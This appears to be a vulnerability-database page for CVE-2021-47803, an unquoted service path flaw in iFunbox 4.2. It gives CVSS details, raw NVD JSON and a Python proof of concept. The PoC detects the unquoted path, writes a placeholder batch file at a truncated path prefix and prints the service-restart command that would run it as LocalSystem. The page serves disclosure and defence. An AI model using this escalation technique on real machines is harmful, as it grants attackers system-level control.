Security Vulnerability Report
CVE-2021-47803 CVSS 7.8 HIGH

CVE-2021-47803

Published: 2026-01-16 00:16:25
Last Modified: 2026-04-15 00:35:42

Description

iFunbox 4.2 contains an unquoted service path vulnerability in the Apple Mobile Device Service that allows local attackers to execute code with elevated privileges. Attackers can insert a malicious executable into the unquoted service path to run with LocalSystem privileges when the service restarts.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

iFunbox 4.2 (all sub-versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
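#!/usr/bin/env python3
# CVE-2021-47803 PoC - iFunbox Unquoted Service Path Privilege Escalation
# This PoC demonstrates the unquoted service path vulnerability in iFunbox's
# Apple Mobile Device Service
# Author: Security Researcher
# Date: 2024
#
# Background (CWE-428): when a service's binary path contains spaces and is
# not wrapped in quotes, Windows resolves the executable by trying each
# space-delimited prefix of the path in turn. The condition only matters
# where a low-privileged user can write to a directory along that path.
# Remediation: quote the service's ImagePath value and keep write access on
# the parent directories limited to administrators.

import os
import re
import subprocess
import sys
import shutil

# Matches the end of the executable name: ".exe" followed by whitespace or
# the end of the string, so trailing service arguments are not counted.
_EXE_END = re.compile(r'\.exe(?=\s|$)', re.IGNORECASE)


def path_is_unquoted_with_spaces(image_path):
    """Return True when the executable portion of *image_path* is unquoted
    and contains a space.

    Only the part of the string up to the executable name is inspected, so a
    path whose only spaces separate the binary from its arguments is not
    reported. When no ".exe" boundary is found the whole string is checked.
    An empty string or a path that starts with a double quote returns False.
    """
    candidate = image_path.strip()
    if not candidate or candidate.startswith('"'):
        return False
    boundary = _EXE_END.search(candidate)
    exe_part = candidate[:boundary.end()] if boundary else candidate
    return ' ' in exe_part


def check_vulnerability():
    """Query the service configuration and report an unquoted binary path.

    Runs ``sc qc`` for the Apple Mobile Device Service and inspects each
    BINARY_PATH_NAME line of its output.

    Returns:
        (True, path) when an unquoted path with a space in the executable
        portion is found, otherwise (False, None). (False, None) is also
        returned when ``sc`` cannot be run or the service is not reported.
    """
    try:
        # Query for the Apple Mobile Device Service
        result = subprocess.run(
            ['sc', 'qc', 'Apple Mobile Device Service'],
            capture_output=True,
            text=True,
        )
    except (OSError, ValueError) as e:
        # OSError: sc is missing or cannot be started; ValueError covers
        # output that cannot be decoded as text.
        print(f'[-] Error checking service: {e}')
        return False, None

    if 'BINARY_PATH_NAME' not in result.stdout:
        return False, None

    # The service exists; whether it is affected is decided per line below.
    print('[+] Service found: Apple Mobile Device Service')
    for line in result.stdout.split('\n'):
        if 'BINARY_PATH_NAME' not in line:
            continue
        # The value follows the first ':'; skip a line that has none.
        _, separator, value = line.partition(':')
        if not separator:
            continue
        path = value.strip()
        print(f'[+] Current path: {path}')
        if path_is_unquoted_with_spaces(path):
            print('[+] VULNERABLE: Path is unquoted with spaces!')
            return True, path
    return False, None


def create_malicious_executable(output_path):
    """Write the placeholder batch file used by this demonstration.

    No executable is compiled or written. The file name is *output_path*
    with '.exe' replaced by '.bat'; its content appends a marker line and
    the output of ``whoami`` to a text file under the Windows Temp
    directory. The final status message prints *output_path*, not the
    '.bat' name that was actually written.

    Returns:
        True once the file has been written. An OSError from ``open``
        propagates to the caller.
    """
    print(f'[*] Creating malicious executable stub at: {output_path}')
    batch_path = output_path.replace('.exe', '.bat')
    # For demonstration, create a simple batch file
    with open(batch_path, 'w') as f:
        f.writelines([
            '@echo off\n',
            'echo [CVE-2021-47803] Privilege Escalation Triggered >> C:\\\\Windows\\\\Temp\\\\pwned.txt\n',
            'whoami >> C:\\\\Windows\\\\Temp\\\\pwned.txt\n',
        ])
    print(f'[+] Malicious file created: {output_path}')
    return True


def exploit(target_path):
    """Derive a file location from *target_path* and write the placeholder.

    The path is stripped of double quotes and split on backslashes; the
    first component is joined with 'Program.exe' and passed to
    create_malicious_executable. The service is not restarted here; the
    restart command is only printed.

    Defender note: the observable events for this class of issue are a new
    file appearing at a truncated prefix of a service path, followed by a
    stop/start of that service.

    Returns:
        True when the placeholder was written, False when the path has
        fewer than two backslash-separated components.
    """
    # For "C:\Program Files\iFunbox\Apple Mobile Device Service\AMS.exe"
    # the page's example location is "C:\Program.exe"
    path_parts = target_path.strip('"').split('\\')
    if len(path_parts) < 2:
        return False

    # Uses the first path component as the directory part.
    injection_dir = path_parts[0]
    malicious_exe = os.path.join(injection_dir, 'Program.exe')
    if not create_malicious_executable(malicious_exe):
        return False

    print(f'[+] Malicious executable placed at: {malicious_exe}')
    print('[+] Next step: Trigger service restart to execute payload')
    print(' Command: sc stop "Apple Mobile Device Service" && sc start "Apple Mobile Device Service"')
    return True


if __name__ == '__main__':
    print('='*60)
    print('CVE-2021-47803 iFunbox Unquoted Service Path PoC')
    print('='*60)
    vulnerable, path = check_vulnerability()
    if vulnerable:
        print('\n[*] Attempting exploitation...')
        exploit(path)
    else:
        print('[-] Target not vulnerable or service not found')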

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47803", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:24.707", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "iFunbox 4.2 contains an unquoted service path vulnerability in the Apple Mobile Device Service that allows local attackers to execute code with elevated privileges. Attackers can insert a malicious executable into the unquoted service path to run with LocalSystem privileges when the service restarts."}, {"lang": "es", "value": "iFunbox 4.2 contiene una vulnerabilidad de ruta de servicio sin comillas en el Servicio de Dispositivos Móviles de Apple que permite a atacantes locales ejecutar código con privilegios elevados. Los atacantes pueden insertar un ejecutable malicioso en la ruta de servicio sin comillas para ejecutarse con privilegios de LocalSystem cuando el servicio se reinicia."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": 
"NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50040", "source": "[email protected]"}, {"url": "https://www.i-funbox.com/en/index.html", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ifunbox-apple-mobile-device-service-unquoted-service-path", "source": "[email protected]"}]}}